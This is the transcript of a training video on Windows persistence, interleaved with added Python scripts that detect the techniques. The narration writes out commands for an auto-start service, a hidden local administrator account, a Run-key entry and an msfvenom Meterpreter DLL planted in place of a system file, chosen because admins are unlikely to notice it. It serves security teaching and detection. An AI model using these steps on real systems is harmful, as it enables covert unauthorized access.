What is Persistence?


Hey, everybody, welcome to the next video. We're going to be looking at Windows persistence.

So in the next video after this, we'll be talking about Linux persistence, but this one is going to be Windows.

And I'm going to talk to you about four different ways we can perform persistence on a Windows machine, just right off the top.

Now, the first one is creating a service.

Now, we've created a service before.

In previous videos, we were going over the Windows OS, but this is going to be a quick recap for everybody.

So if we go ahead and access our shell, we'll do sc create, and we'll use secret as the name of the service, then binpath= with a space at the end.

Always remember that space. The path will be C:\ and we'll call this secret, and we'll do start= auto, which is the important part here.

So it starts up at startup.

There we go.

So if we go ahead and take a look at the service with sc query secret, we can see that it's currently not running, which is exactly what we'd expect, and sc qc secret.

We can see that we have our Win32 process, and its start type is auto.

The binary path is secret, the display name is secret, and the service start name is LocalSystem, which means it's going to start up as LocalSystem, which is exactly what we want.

Go ahead and delete that so we don't have it running and causing errors.

But as you can see, this is the first step in making persistence.

We've got a service that runs on startup and then we'll always be good to go.

The next is just like what we're going to show you in the Linux persistence video tomorrow: we're going to create a user.

So to create a user on Windows, it's net user and then the name.

So we'll call this redteam, then /add. That will go ahead and add the user for us, and then we can do net user redteam *, which will allow us to reset the password.

However, because of the type of prompt that we have, it's going to just fail.

It's going to just basically put empty text in the field and enter it, and that's going to show it having typed the password and typed it again, and then "command successfully executed".

Now, when you run this on the local system, you'll have a different result.

But right now we have a user with no password, which is fine on some systems and not fine on others, depending on the group policies that are put into effect.

Because if there is a policy where you have to have a password to RDP to a machine, as an example, then you couldn't use this to RDP to a machine; you would have to find a different way to reset the password.

So I'll go ahead and leave that to you guys to go ahead and find a different way to reset a user's password through the command line without having to use this particular way.

Now, the last step is we're going to want to add the user to the administrators group.

So that's net localgroup administrators.

And then the user name, /add.

That's it.

Now we've got a user account created called redteam with no password, and it is also part of the local administrators group, which means we are OK and good to go.

Now, the last part I want to show you guys. OK, that doesn't go there; this one is number three now.

For this one, I want to show you guys how to set up a registry key that allows Windows, when it starts up, to use that particular registry key to start an application.

So if you're already managing Windows systems, you'll find this registry key pretty straightforward.

It's the CurrentVersion\Run key.

Which is where, whenever that user logs in or the system starts, it'll go ahead and run through this registry key, or any value under this key, and go ahead and launch it.

So the first thing we do is reg add and then HKCU for the current user's registry hive, \Software\Microsoft\Windows\CurrentVersion\Run. This is a fairly common path, and most things that run on startup for the current user are going to end up in a registry value here.

So we give it a name with /v, we'll say secret as well.

Secret, and the type, in this particular case, it's /t REG_SZ, and /f to force, so anything else that's labeled secret we'll just overwrite, and /d.

So the path that we're going to want to use, we'll use secret.

So we've gone ahead and added that, so I'm going to show you guys real quickly what this looks like from a registry viewpoint.

There you go.

So you can see here we've got HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.

So go ahead and refresh.

OK, so the reason why we don't see the key, even though it was created, is that if we run getuid, we're NT AUTHORITY\SYSTEM, so we're the system user.

So right now, this is currently the administrative user.

So what we'll do is we'll go ahead and kill this Meterpreter session.

We'll rerun it and we'll go ahead and launch our exploit one more time as the system user.

And you can see here, we got it.

So if we do shell now, we're administrator instead of system, and we copy this same command.

It's not what we're looking for.

Copy paste.

Go and run that again.

And if we come back in here again under that same key, but now as the correct user, and we hit refresh, we now see our registry value.

Make sure you keep that in mind.

Now, if you have it running as system, it's a little bit flaky when you do that.

But when you're working with this type of registry key where you're doing a startup, you're going to want it to be under a specific user rather than the system user.

Now, you could do this and, instead of the current user hive, have it go against the local machine hive.

And that works just as fine.

We're going to close this.

Perfect.
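The three techniques covered so far (an auto-start service, a new local account dropped into Administrators, and a value under the Run key) each leave a log record that a defender can hunt for. The script below is an added example, not part of the original video or course material: it triages a handful of constructed Windows event records (System 7045 for service installation, Security 4720 and 4732 for account creation and group membership, Sysmon Event ID 13 for registry value writes) and flags exactly the artifacts the video creates. The sample events, SIDs and paths are constructed; the "trusted path" heuristic is an assumption of this example, not a Windows rule.

```python
"""Triage constructed Windows event records for the persistence artifacts the
video demonstrates: auto-start services, new local admins and Run-key writes.
All events below are constructed samples, not captured logs."""
import re

# Heuristic (assumption of this example): auto-start images and Run-key targets
# living outside these prefixes deserve a look.
TRUSTED_PREFIXES = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                    "c:\\program files\\", "c:\\program files (x86)\\")
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?\\", re.I)
BUILTIN_ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of the local Administrators group
# Writers that usually mean "someone typed this", not an installer.
SCRIPTING_IMAGES = ("reg.exe", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "rundll32.exe")

SAMPLE_EVENTS = [  # constructed
    {"channel": "System", "event_id": 7045, "ServiceName": "secret",
     "ImagePath": "C:\\secret.exe", "StartType": "auto start", "AccountName": "LocalSystem"},
    {"channel": "System", "event_id": 7045, "ServiceName": "Spooler",
     "ImagePath": "C:\\Windows\\System32\\spoolsv.exe", "StartType": "auto start", "AccountName": "LocalSystem"},
    {"channel": "Security", "event_id": 4720, "TargetUserName": "redteam",
     "TargetSid": "S-1-5-21-1111-2222-3333-1001", "SubjectUserName": "Administrator"},
    {"channel": "Security", "event_id": 4732, "MemberSid": "S-1-5-21-1111-2222-3333-1001",
     "TargetUserName": "Administrators", "TargetSid": "S-1-5-32-544", "SubjectUserName": "Administrator"},
    {"channel": "Sysmon", "event_id": 13, "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\secret",
     "Details": "C:\\secret.exe"},
    {"channel": "Sysmon", "event_id": 13, "Image": "C:\\Windows\\System32\\msiexec.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
     "Details": "\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"},
]


def _normalize_path(p):
    """Lower-case, drop surrounding quotes and keep only the executable part of
    a command line such as '"C:\\x.exe" -arg'."""
    p = p.strip().strip('"').lower()
    m = re.match(r"^(.*?\.(exe|dll|bat|cmd|vbs|ps1))", p)
    return m.group(1) if m else p


def _is_trusted(p):
    return _normalize_path(p).startswith(TRUSTED_PREFIXES)


def triage(events):
    """Return a list of findings, one per suspicious event, in input order."""
    findings = []
    for e in events:
        ch, eid = e["channel"], e["event_id"]
        if ch == "System" and eid == 7045:
            # A service set to auto start whose binary is not in a trusted location.
            if e.get("StartType", "").lower().startswith("auto") and not _is_trusted(e["ImagePath"]):
                findings.append({"rule": "autostart_service_untrusted_path",
                                 "subject": e["ServiceName"], "detail": e["ImagePath"]})
        elif ch == "Security" and eid == 4720:
            # Every local account creation is worth recording; keyed on SID for correlation.
            findings.append({"rule": "local_account_created",
                             "subject": e["TargetSid"], "detail": e["TargetUserName"]})
        elif ch == "Security" and eid == 4732 and e.get("TargetSid") == BUILTIN_ADMINISTRATORS_SID:
            findings.append({"rule": "added_to_local_administrators",
                             "subject": e["MemberSid"], "detail": e["TargetUserName"]})
        elif ch == "Sysmon" and eid == 13 and RUN_KEY_RE.search(e["TargetObject"]):
            writer = e["Image"].rsplit("\\", 1)[-1].lower()
            # Run-key writes by reg.exe/cmd.exe, or pointing outside trusted paths.
            if writer in SCRIPTING_IMAGES or not _is_trusted(e["Details"]):
                findings.append({"rule": "run_key_write", "subject": e["TargetObject"],
                                 "detail": f"{e['Details']} (written by {writer})"})
    return findings


def new_admin_accounts(findings):
    """SIDs that were both created (4720) and added to Administrators (4732):
    the exact sequence the video performs with net user and net localgroup."""
    created = {f["subject"] for f in findings if f["rule"] == "local_account_created"}
    admined = {f["subject"] for f in findings if f["rule"] == "added_to_local_administrators"}
    return sorted(created & admined)


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for f in found:
        print(f"{f['rule']:36} {f['subject']}  ->  {f['detail']}")
    print("new local admins:", new_admin_accounts(found))
```

The benign Spooler service and the installer-written OneDrive value pass through untouched, while the secret service, the redteam account and the reg.exe-written Run value are all reported; correlating 4720 with 4732 on the SID is what turns two low-severity records into one high-confidence finding.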

Now, the last step I want to talk to you guys about is DLL preloading.

So what this is, is it allows you to create a binary or a DLL with the same name as another one that's already on the system, and you overwrite that binary on the system with your own one.

Now, this is normally considered a dirty persistence because it's very obvious in some cases to the user or the admin, because now all of a sudden the binary is not doing what it's supposed to do when it's loaded.

So a quick way for us to go ahead and do that as well: create a binary. We'll do... here it is.

We're going to do msfvenom, we're going to use a 64-bit Meterpreter reverse TCP with the correct parameters, and we're going to use -f dll, and then we're going to call this fxsst.dll.

So we'll go ahead and create that.

Now, fxsst is used for the fax service on the Windows machine, so it's less likely to be noticed if there's an error with the fax service, because there's not really as much use for the fax service as there is for, like, logging in or using the Internet or anything else like that.

So it's less obvious to the current user, and admins are less likely to bother looking at a system if it's having some startup failure for a fax service.

Now, if we go ahead and look here, we have our fxsst.dll, and in our Meterpreter shell, we're not in our shell anymore; we're in the Meterpreter shell.

If we go ahead and do lls, so that's the local ls, you can see this is our local machine.

But if we do ls, we can see that this is now our external machine, the one we've actually compromised.

And you can do a local change directory with lcd. You just put an l in front of whatever you want when you're referring to it locally.

So what we're going to want to do is run upload fxsst.dll. It'll upload to whatever the current directory is.

So if we do ls, we can see we now have it moved in here correctly.

Let's go ahead and go to shell, and we'll do a dir to make sure it's there, and it is.

So what you would normally do is copy fxsst.dll, and we would copy that over into Windows\System32, and that's it; then you would say yes, you want to overwrite anything there.

However, you're going to get an access denied.

So what I want you guys to do is take a little bit of time and research to identify why.

Keep in mind, this is a Windows 7 machine, not Windows XP.

Why is it not allowing you to overwrite this file?

And then what are some ways for you to override the file?

I want you guys to take that little bit of extra time and do the research around it and go back to the Facebook group and let us know how you guys decided to go about it.
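From the defender's side, the DLL replacement above is caught by comparing the on-disk copy of the library against a known-good hash, and the broader "preloading" variant (a same-named DLL placed in a directory the loader consults before System32) is caught by checking each directory in that search order. The script below is an added example, not part of the video or the course: it builds a constructed directory tree in a temp folder, records a baseline hash of a stand-in fxsst.dll, then shows both a modified system copy and a shadow copy being reported. The directory layout, file contents and the choice of the parent Windows folder as the "application directory" are assumptions of this example.

```python
"""Audit a named DLL for the two failure modes the video describes: the System32
copy being overwritten, and a same-named copy sitting earlier in the DLL search
order. Everything on disk here is constructed in a temporary directory."""
import hashlib
import os
import tempfile


def sha256_file(path):
    """Streaming SHA-256 so large DLLs are not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def audit_dll(dll_name, search_dirs, system_dir, baseline_sha256):
    """search_dirs: directories the loader consults before system_dir (for a
    given process: its application directory, then the working directory).
    Returns (rule, path) findings; an empty list means nothing suspicious."""
    findings = []
    system_copy = os.path.join(system_dir, dll_name)
    if not os.path.isfile(system_copy):
        findings.append(("missing_system_copy", system_copy))
    elif sha256_file(system_copy) != baseline_sha256:
        # The file the OS should load no longer matches the golden image.
        findings.append(("system_copy_modified", system_copy))
    for d in search_dirs:
        candidate = os.path.join(d, dll_name)
        if os.path.isfile(candidate):
            # Any same-named DLL earlier in the search order wins over System32.
            findings.append(("shadow_copy_earlier_in_search_order", candidate))
    return findings


def demo():
    """Constructed scenario: clean baseline, then an overwrite plus a shadow copy."""
    with tempfile.TemporaryDirectory() as root:
        system_dir = os.path.join(root, "Windows", "System32")
        app_dir = os.path.join(root, "Windows")  # assumed application directory
        os.makedirs(system_dir)
        genuine = os.path.join(system_dir, "fxsst.dll")
        with open(genuine, "wb") as f:
            f.write(b"constructed stand-in for the genuine DLL\n")
        baseline = sha256_file(genuine)  # in practice: hash from a known-good image

        clean = audit_dll("fxsst.dll", [app_dir], system_dir, baseline)

        # Simulate both tampering paths from the video.
        with open(os.path.join(app_dir, "fxsst.dll"), "wb") as f:
            f.write(b"constructed stand-in for a planted DLL\n")
        with open(genuine, "wb") as f:
            f.write(b"constructed stand-in for an overwritten DLL\n")
        dirty = audit_dll("fxsst.dll", [app_dir], system_dir, baseline)
        return clean, dirty


if __name__ == "__main__":
    before, after = demo()
    print("clean baseline findings:", before)
    for rule, path in after:
        print(f"{rule:40} {path}")
```

On a real host the baseline would come from a clean install or the vendor's catalog rather than from the machine being checked, and the search directories would be derived per loading process; the point the example makes is that both variants reduce to "the bytes the loader will pick up are not the bytes you expect", which is a hash comparison plus a path walk.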
